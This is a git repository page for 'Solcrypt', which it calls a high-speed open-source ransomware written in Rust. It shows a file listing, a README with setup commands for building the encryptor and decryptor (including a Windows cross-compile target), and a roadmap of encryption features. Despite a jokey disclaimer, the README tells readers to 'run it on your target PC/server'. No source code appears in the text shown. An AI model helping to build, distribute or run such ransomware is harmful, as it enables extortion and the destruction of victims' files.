A high-speed FOSS ransomware written in Rust
Find a file
2024-06-17 16:51:10 +03:00
src feat: linux compat fix 2024-06-17 14:53:59 +03:00
.gitignore cleanup: move test files to their own directory 2024-06-10 11:02:50 +03:00
build.sh feat: add build.sh 2024-06-16 12:13:57 +03:00
Cargo.lock init: add code 2024-06-10 10:57:56 +03:00
Cargo.toml fix: use walkdir instead of std 2024-06-17 13:20:47 +03:00
LICENSE feat: add license & readme 2024-06-14 17:07:17 +03:00
README.md feat: add todo list 2024-06-17 16:51:10 +03:00

Solcrypt

A "hobby project" ransomware that isn't really meant to be used for illegal purposes. I made this for fun, ok? Don't get me in legal trouble for it

Setup

Arch

sudo pacman -S rustup
rustup default stable
rustup target add x86_64-pc-windows-gnu # if compiling for windows targets
git clone https://git.xorycode.dev/xory/solcrypt
cd solcrypt 
bash build.sh # this builds both encryptor and decryptor

Then run it on your target PC/server

Roadmap

  • Basic home directory encryption
  • Randomly generated encryption key
  • Randomly generate key at runtime
  • Server
  • Meow?